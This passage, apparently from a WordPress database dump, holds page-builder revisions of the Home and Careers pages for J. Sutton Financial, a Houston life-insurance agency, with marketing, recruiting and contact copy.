#ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 20:10:46','2023-03-26 20:10:46','',138,'http://cmdev-site1.com/?p=539',0,'revision','',0),(740,1,'2023-04-03 23:56:29','2023-04-03 23:56:29','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"700px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" hover_transition_speed_curve=\"ease-out\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-03 23:56:29','2023-04-03 23:56:29','',528,'http://cmdev-site1.com/?p=740',0,'revision','',0),(579,1,'2023-04-02 17:52:42','2023-04-02 17:52:42','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-02 17:52:42','2023-04-02 17:52:42','',528,'http://cmdev-site1.com/?p=579',0,'revision','',0),(544,1,'2023-03-26 20:15:52','2023-03-26 20:15:52','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<p><!-- wp:heading {\"textAlign\":\"center\"} --></p>\r\n<p><span style=\"background-color: #ffff99;\">BOTTOM OF PAGE: The layout and verbiage are a go. I pulled the photos. They each have a title that matches the job description below.</span></p>\r\n<p>&nbsp;</p>\r\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Future With Us</h1>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<h2 style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></h2>\r\n<p>Some insurance companies only care about making money from their insurance policies. But at J. Sutton, we care about people. And Agents who choose to sell our life insurance have an opportunity to make an impact on their clients, their community, their family, and their career. There’s way more to it than meets the eye.</p>\r\n<p>J. Sutton Financial attracts a select group of leaders, entrepreneurs, and high achievers eager to jumpstart their sales careers with a fast-paced and stable company.</p>\r\n<h2 style=\"text-align: center;\">Opportunity <strong>Unlimited</strong></h2>\r\n<p>At J. Sutton Financial, \'Opportunity Unlimited\' means you decide what you are worth. As an independent contractor, you are in control. Your performance determines how much money you make and how far you take your career. Selling our products gives you the opportunity to earn as much as you desire.</p>\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available openings and how you can join our team today!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\r\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\r\n<!-- /wp:image -->\r\n\r\n<!-- wp:paragraph --><!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\"> </h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} --><!-- /wp:paragraph -->[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-26 20:15:52','2023-03-26 20:15:52','',38,'http://cmdev-site1.com/?p=544',0,'revision','',0),(549,3,'2023-03-28 13:04:56','2023-03-28 13:04:56','{\n    \"site_icon\": {\n        \"value\": 196,\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2023-03-28 13:04:56\"\n    }\n}','','','trash','closed','closed','','3e8b6a44-edb0-4688-9005-a30381094fb1','','','2023-03-28 13:04:56','2023-03-28 13:04:56','',0,'http://cmdev-site1.com/2023/03/28/3e8b6a44-edb0-4688-9005-a30381094fb1/',0,'customize_changeset','',0),(548,1,'2023-03-26 20:30:16','2023-03-26 20:30:16','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\" column_structure=\"1_3,2_3\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image _builder_version=\"4.20.2\" _module_preset=\"default\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p><strong>WE ARE HIRING!</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-26 20:30:16','2023-03-26 20:30:16','',38,'http://cmdev-site1.com/?p=548',0,'revision','',0),(546,1,'2023-03-26 20:17:04','2023-03-26 20:17:04','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"]<p><!-- wp:heading {\"textAlign\":\"center\"} --></p>\n<p><strong>WE ARE HIRING!</strong></p>\n<p>&nbsp;</p>\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Future With Us</h1>\n<p><!-- /wp:heading --></p>\n<p><!-- wp:paragraph {\"align\":\"center\"} --></p>\n<h2 style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></h2>\n<p>Some insurance companies only care about making money from their insurance policies. But at J. Sutton, we care about people. And Agents who choose to sell our life insurance have an opportunity to make an impact on their clients, their community, their family, and their career. There’s way more to it than meets the eye.</p>\n<p>J. Sutton Financial attracts a select group of leaders, entrepreneurs, and high achievers eager to jumpstart their sales careers with a fast-paced and stable company.</p>\n<h2 style=\"text-align: center;\">Opportunity <strong>Unlimited</strong></h2>\n<p>At J. Sutton Financial, \'Opportunity Unlimited\' means you decide what you are worth. As an independent contractor, you are in control. Your performance determines how much money you make and how far you take your career. Selling our products gives you the opportunity to earn as much as you desire.</p>\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available openings and how you can join our team today!</p>\n<p><!-- /wp:paragraph --></p>\n<p><!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph --></p>\n<p><!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} --></p>\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\n<p><!-- /wp:image --></p>\n<p><!-- wp:paragraph --><!-- /wp:paragraph --></p>\n<p><!-- wp:heading {\"textAlign\":\"center\"} --></p>\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\"> </h2>\n<p><!-- /wp:heading --></p>\n<p><!-- wp:paragraph {\"align\":\"center\"} --><!-- /wp:paragraph --></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-26 20:17:04','2023-03-26 20:17:04','',38,'http://cmdev-site1.com/?p=546',0,'revision','',0),(553,1,'2023-03-31 20:40:17','2023-03-31 20:40:17','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_4,3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"roll\" sticky_enabled=\"0\" width=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" custom_margin=\"77px|||||\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"10px|auto||auto||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" width=\"70%\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||183px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"168px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"12px|||||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-31 20:40:17','2023-03-31 20:40:17','',138,'http://cmdev-site1.com/?p=553',0,'revision','',0),(552,1,'2023-03-31 20:39:27','2023-03-31 20:39:27','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_4,3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" 